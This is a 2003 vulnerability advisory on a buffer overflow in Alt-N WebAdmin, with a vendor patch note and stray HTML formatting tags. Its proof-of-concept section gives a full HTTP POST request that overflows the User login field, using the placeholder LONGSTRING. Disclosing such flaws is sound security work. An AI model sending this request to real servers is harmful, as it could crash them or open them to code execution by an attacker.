Reported June 24, 2003, by Mark Litchfield.

 

 

VERSIONS AFFECTED

 

  • Alt-N Technologies WebAdmin

 

DESCRIPTION

 

<span style="font-family: Symbol">·<span style='font:7.0pt "Times New Roman"'>         </h3></h3><span style="font-family:Verdana">A buffer overflow vulnerability in Alt-N Technologies WebAdmin can result in the execution of arbitrary code on the vulnerable computer. </h3> <span style="font-family:Verdana"> </h3>

DEMONSTRATION

 

The discoverer posted the following scenario as proof of concept.

 

POST /WebAdmin.dll?View=Logon HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

application/x-shockwave-flash, */*

Referer: http://ngssoftware.com:1000/

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: MyUser Agent

Host: NGSSoftware.com

Content-Length: 74

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: User=NGSSOFTWARE; Lang=en; Theme=Standard

 

User=LONGSTRING&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In

 

 

VENDOR RESPONSE

 

<span style="font-family:Verdana"><a href="http://www.altn.com/" style="color: blue; text-decoration: underline; text-underline: single">Alt-N Technologies </a>has released a <a href="ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe" style="color: blue; text-decoration: underline; text-underline: single">patch</a> to fix this vulnerability.</h3>

 

CREDIT

Discovered by Mark Litchfield of NGSSoftware.